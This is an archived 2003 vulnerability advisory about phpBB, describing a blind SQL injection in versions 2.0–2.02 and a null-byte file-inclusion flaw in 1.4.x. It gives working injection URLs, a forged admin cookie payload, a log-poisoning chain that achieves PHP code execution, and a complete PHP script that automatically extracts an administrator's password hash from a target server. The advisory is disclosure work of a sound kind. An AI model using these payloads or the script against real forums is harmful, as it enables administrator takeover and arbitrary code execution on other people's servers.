Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: Frequently Exploited :: web6007.htm

phpBB Security Bugs



21th Feb 2003 [SBWID-6007]
COMMAND

	phpBB Security Bugs

SYSTEMS AFFECTED

	Security Issue in phpBB 2.0,2.01, 2.02

PROBLEM

	Vulnerability discovered by David Zentner [david@cgishield.com]
	
	 http://CGIshield.com
	
	phpBB, the most popular open source bulletin board software on the  net,
	is vulnerable to a remotely exploitable SQL injection bug  which  allows
	stealing an administrator's password hash. With the  hash,  an  attacker
	may login and gain complete control of the administrative  side  of  the
	system.
	
	The actual attack carried out via a select fish attack, by  manipulating
	the select query in the page_header.php file in order  to  return  users
	online based on certain criteria, such as characters of  their  password
	hash.
	
	For example, if the user is attemping to hack a user_id of '40' he  will
	request the following page:
	
	http://site/phpBB/index.php?forum_id=1+or+user_id=40+and+mid
	(user_password,1,1)=char(97)/*
	
	The resultant query will be:
	
	SELECT  u.username,  u.user_id,  u.user_allow_viewonline,  u.user_level,
	s.session_logged_in, s.session_ip FROM phpbb_users u,  phpbb_sessions  s
	WHERE u.user_id = s.session_user_id  AND  s.session_time  >=  1035778374
	AND      s.session_page      =      1      or       user_id=40       and
	mid(user_password,1,1)=char(97)/* ORDER BY u.username ASC,  s.session_ip
	ASC
	
	If a correct password hash digit is guessed, the admin's name will  show
	up as an online user, in the online user  list  at  the  bottom  of  the
	forum page. After the password hash is determined, it is then placed  in
	the cookie and access is granted to the site.
	
	So   if   the   user_id   is   32360   and   the   password   hash    is
	6a204bd89f3c8348afd5c77c717a097a,  then  an  attacker  would  take   the
	following value:
	
	a:2:
	{s:11:"autologinid";s:32:"6a204bd89f3c8348afd5c77c717a097a";s:6:"userid";s:
	5:"31360";} www.phpbb.com/ 1536 1063947136 29596959 197425936 29523534 * 
	
	urlencode() it, and  place  it  in  a  cookie  with  the  variable  name
	'phpbb2support_data', then access would be gained to the admin panel  on
	any phpbb site.
	
	One could  use  a  script  to  speed  the  process  of  exploiting  this
	vulnerability. Something similar to  the  script  at  the  end  of  this
	document.
	
	 Security issue in PHPbb 1.4.x
	 =============================
	
	PHPbb, the most popular open source bulletin board software on the  net,
	is vulnerable to a remotely exploitable file manipulation attack,  which
	may allow an attacker to execute arbitrary php code on the system.
	
	It involves the following code which is located in auth.php:
	
	include('language/lang_'.$default_lang.'.'.$phpEx);
	
	This  code  strips  all  slashes  from  incoming  user   data,   thereby
	unescaping any user inputed NULL bytes. An attacker can  then  supply  a
	null byte ('% 00' when urlencoded)  ,  and  any  characters  which  come
	after the null byte arent treated as part of  the  file  name.  This  is
	because when the PHP interpreter reads the file name, it  will  stop  at
	the first null byte.
	
	In this particular situation, the ability  to  poison  the  filename  is
	significant, because a user may then load any file on  the  system  into
	the interpreter and have PHP execute it. For example, if a user  selects
	a language of value:
	
	'/../../../var/logs/apache/access.log%00' , 
	
	The apache access.log will be included by this attack.
	
	This flaw can be exploited by registering an account,  logging  in,  and
	then calling the following url. (replace user=admin with the  registered
	name, and passwd=asdfasdf with corresponding password):
	
	http://localhost/phpBB/prefs.php?HTTP_POST_VARS[save]
	=1&passwd=asdfasdf&viewemail=0&savecookie=0&sig=0&smile=0&dishtml=0&disbbco
	de=0&themes=1〈=/../../../var/logs/apache/access.log%
	00&save=1&user=admin&submit=Save%20Preferences
	
	What good is the ability to execute any file on the target server?  Well
	consider if the attacker calls the url:
	
	http://sitename.com/phpbb/index.php<?phpinfo();?> 
	
	The PHP command is stored  in  the  apache  access.log  file,  and  then
	executed by the include() function,  thereby  allowing  an  attacker  to
	execute arbitrary PHP on any target server.
	
	PHPbb responded: " As for the 1.4.4 bug, we won't fix that.  We've  said
	time and again that there are many security flaws in 1.4.4 and that  any
	sane webmaster should upgrade to 2.x. Please don't bother searching  for
	or notifying us of phpBB 1.x bugs."
	
	
	<?php
	
	########## PHPBB 2.0,2.01,2.02 Auto-SelectFish Attacker
	########## David@cgishield.com
	
	
	// To use this program, simply upload it to a php enabled webserver, and 
	execute
	// If php times out before the whole password hash is determined, 
	// adjust the maximum script execution time in php.ini
	// Also, replace following with correct values:
	
	$server="192.168.1.100";
	$script="/phpbb2/index.php";
	$the_userid_to_hack="2";
	
	
	// don't change this
	$data_to_match="In total there are <b>0</b> users online";
	
	$checkchar[0]="char(48)";
	$checkchar[1]="char(49)";
	$checkchar[2]="char(50)";
	$checkchar[3]="char(51)";
	$checkchar[4]="char(52)";
	$checkchar[5]="char(53)";
	$checkchar[6]="char(54)";
	$checkchar[7]="char(55)";
	$checkchar[8]="char(56)";
	$checkchar[9]="char(57)";
	$checkchar[a]="char(97)";
	$checkchar[b]="char(98)";
	$checkchar[c]="char(99)";
	$checkchar[d]="char(100)";
	$checkchar[e]="char(101)";
	$checkchar[f]="char(102)";
	
	for($i=1;$i<33;$i++){
	reset($checkchar);
	while (list($i2, $i2val) = @each($checkchar)){
		$vars="forum_id=1+or+user_id=$the_userid_to_hack+and+mid
	(user_password,$i,1)=$checkchar[$i2]/*";
		$data=sendToHost("$server",'post',"$script","$vars");
		if (eregi("$data_to_match","$data")){
			//echo("<b>$i2</b>");
		}
	else{echo("<br>$i= $i2"); flush();break;}
		}
	}
	
	
	function sendToHost($host,$method,$path,$data,$useragent=1)
	{
		$method = strtoupper($method);
		$fp = fsockopen($host,80);
		fputs($fp, "$method $path HTTP/1.1\n");
		fputs($fp, "Host: $host\n");
		fputs($fp, "Content-type: application/x-www-form-urlencoded\n");
		fputs($fp, "Content-length: " . strlen($data) . "\n");
		if ($useragent)
			fputs($fp, "User-Agent: Mozilla\n");
		fputs($fp, "Connection: close\n\n");
		if ($method == 'POST')
			fputs($fp, $data);
		while (!feof($fp))
			$buf .= fgets($fp,128);
		fclose($fp);
	for($slow=0;$slow<100;$slow++){}
	
		return $buf;
	}
	
	?>
	

SOLUTION

	Fixed in 2.03


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH